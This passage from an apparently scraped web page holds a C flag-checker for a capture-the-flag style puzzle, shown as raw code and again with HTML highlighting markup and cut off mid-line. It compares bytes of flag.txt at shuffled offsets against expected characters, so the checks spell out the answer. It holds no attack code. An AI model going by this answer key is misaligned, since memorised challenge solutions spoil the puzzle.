fseek(fp,590,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,169,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,527,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,389,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,546,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,424,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,136,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,425,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,549,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,307,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,226,SEEK_SET);c=fgetc(fp);if(c != 96){oops();} fseek(fp,13,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,693,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,349,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,1,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,525,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,342,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,522,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,292,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,71,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,694,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,559,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,613,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,337,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,685,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,552,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,480,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,391,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,519,SEEK_SET);c=fgetc(fp);if(c != 10){oops();} fseek(fp,417,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,356,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,561,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,318,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,311,SEEK_SET);c=fgetc(fp);if(c != 10){oops();} fseek(fp,207,SEEK_SET);c=fgetc(fp);if(c != 10){oops();} fseek(fp,33,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,684,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,187,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,464,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,447,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,670,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,498,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,333,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,443,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,302,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,170,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,453,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,352,SEEK_SET);c=fgetc(fp);if(c != 47){oops();} fseek(fp,605,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,508,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,28,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,25,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,619,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,15,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,26,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,264,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,359,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,144,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,479,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,219,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,471,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,74,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,134,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,413,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,165,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,721,SEEK_SET);c=fgetc(fp);if(c != 47){oops();} fseek(fp,400,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,96,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,258,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,392,SEEK_SET);c=fgetc(fp);if(c != 46){oops();} fseek(fp,327,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,90,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,656,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,530,SEEK_SET);c=fgetc(fp);if(c != 92){oops();} fseek(fp,393,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,109,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,488,SEEK_SET);c=fgetc(fp);if(c != 39){oops();} fseek(fp,581,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,63,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,414,SEEK_SET);c=fgetc(fp);if(c != 92){oops();} fseek(fp,700,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,597,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,446,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,149,SEEK_SET);c=fgetc(fp);if(c != 47){oops();} fseek(fp,312,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,62,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,288,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,456,SEEK_SET);c=fgetc(fp);if(c != 92){oops();} fseek(fp,603,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,243,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,463,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,192,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,17,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,132,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,461,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,625,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,193,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,412,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,42,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,196,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,182,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,478,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,394,SEEK_SET);c=fgetc(fp);if(c != 96){oops();} fseek(fp,579,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,688,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,245,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,8,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,657,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,535,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,509,SEEK_SET);c=fgetc(fp);if(c != 39){oops();} fseek(fp,344,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,330,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,595,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,81,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,649,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,267,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,140,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,127,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,395,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,481,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,336,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,490,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,218,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,175,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,200,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,362,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,554,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,157,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,91,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,723,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,266,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,513,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,231,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,160,SEEK_SET);c=fgetc(fp);if(c != 47){oops();} fseek(fp,452,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,376,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,467,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,195,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,604,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,660,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,416,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,108,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,672,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,179,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,405,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,52,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,18,SEEK_SET);c=fgetc(fp);if(c != 46){oops();} fseek(fp,59,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,642,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,123,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,638,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,14,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,564,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,624,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,511,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,545,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,566,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,314,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,704,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,528,SEEK_SET);c=fgetc(fp);if(c != 47){oops();} fseek(fp,472,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,408,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,520,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,305,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,225,SEEK_SET);c=fgetc(fp);if(c != 39){oops();} fseek(fp,139,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,294,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,75,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,138,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,385,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,441,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,216,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,503,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,150,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,538,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,646,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,674,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,570,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,164,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,628,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,41,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,431,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,117,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,70,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,489,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,593,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,451,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,263,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,510,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,350,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,290,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,72,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,583,SEEK_SET);c=fgetc(fp);if(c != 47){oops();} fseek(fp,43,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,713,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,643,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,415,SEEK_SET);c=fgetc(fp);if(c != 10){oops();} fseek(fp,532,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,696,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,679,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,514,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,620,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,384,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,229,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,181,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,515,SEEK_SET);c=fgetc(fp);if(c != 47){oops();} fseek(fp,214,SEEK_SET);c=fgetc(fp);if(c != 46){oops();} fseek(fp,277,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,585,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,354,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,614,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,407,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,39,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,113,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,257,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,358,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,502,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,12,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,698,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,282,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,351,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,94,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,529,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,320,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,162,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,714,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,112,SEEK_SET);c=fgetc(fp);if(c != 92){oops();} fseek(fp,101,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,468,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,297,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,269,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,701,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,152,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,494,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,273,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,398,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,287,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,260,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,7,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,141,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,440,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,626,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,48,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,648,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,680,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,125,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,455,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,544,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,518,SEEK_SET);c=fgetc(fp);if(c != 47){oops();} fseek(fp,154,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,64,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,482,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,437,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,473,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,506,SEEK_SET);c=fgetc(fp);if(c != 39){oops();} fseek(fp,658,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,460,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,689,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,46,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,630,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,659,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,560,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,537,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,106,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,37,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,476,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,360,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,669,SEEK_SET);c=fgetc(fp);if(c != 92){oops();} fseek(fp,217,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,122,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,562,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,67,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,375,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,212,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,373,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,332,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,310,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,180,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,210,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,483,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,692,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,121,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,230,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,555,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,236,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,129,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,439,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,103,SEEK_SET);c=fgetc(fp);if(c != 10){oops();} fseek(fp,420,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,599,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,487,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,644,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,682,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,647,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,712,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,85,SEEK_SET);c=fgetc(fp);if(c != 46){oops();} fseek(fp,390,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,133,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,261,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,449,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,631,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,459,SEEK_SET);c=fgetc(fp);if(c != 92){oops();} fseek(fp,401,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,87,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,78,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,686,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,699,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,432,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,366,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,371,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,484,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,587,SEEK_SET);c=fgetc(fp);if(c != 92){oops();} fseek(fp,221,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,582,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,343,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,368,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,623,SEEK_SET);c=fgetc(fp);if(c != 10){oops();} fseek(fp,725,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,3,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,470,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,627,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,211,SEEK_SET);c=fgetc(fp);if(c != 46){oops();} fseek(fp,353,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,246,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,380,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,531,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,608,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,571,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,233,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,433,SEEK_SET);c=fgetc(fp);if(c != 46){oops();} printf("CORRECT!\n"); fclose(fp); return(0); }"> #<span>include</span> <span><span><</span>stdio.h<span>></span></span> #<span>include</span> <span><span><</span>stdlib.h<span>></span></span> <span>int</span> <span>oops</span>(){ <span>printf</span>(<span><span>"</span>oops this wasn't the char I was looking for<span>\n</span><span>"</span></span>); <span>exit</span>(<span>1</span>); <span>return</span> <span>0</span>; } <span>int</span> <span>main</span> () { FILE *fp; <span>char</span> c; fp = <span>fopen</span>(<span><span>"</span>flag.txt<span>"</span></span>,<span><span>"</span>r<span>"</span></span>); <span>if</span> (fp==<span>NULL</span>) { <span>printf</span>(<span><span>"</span>error opening file<span>\n</span><span>"</span></span>); <span>exit</span>(<span>1</span>); } <span>fseek</span>(fp,<span>540</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>711</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>73</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>68</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>155</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>673</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>35</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>309</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>148</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>280</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>474</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>96</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>240</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>178</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>340</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>695</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>526</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>286</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>313</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>259</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>543</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>256</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>584</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>97</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>55</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>0</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>22</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>615</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>47</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>300</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>30</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != 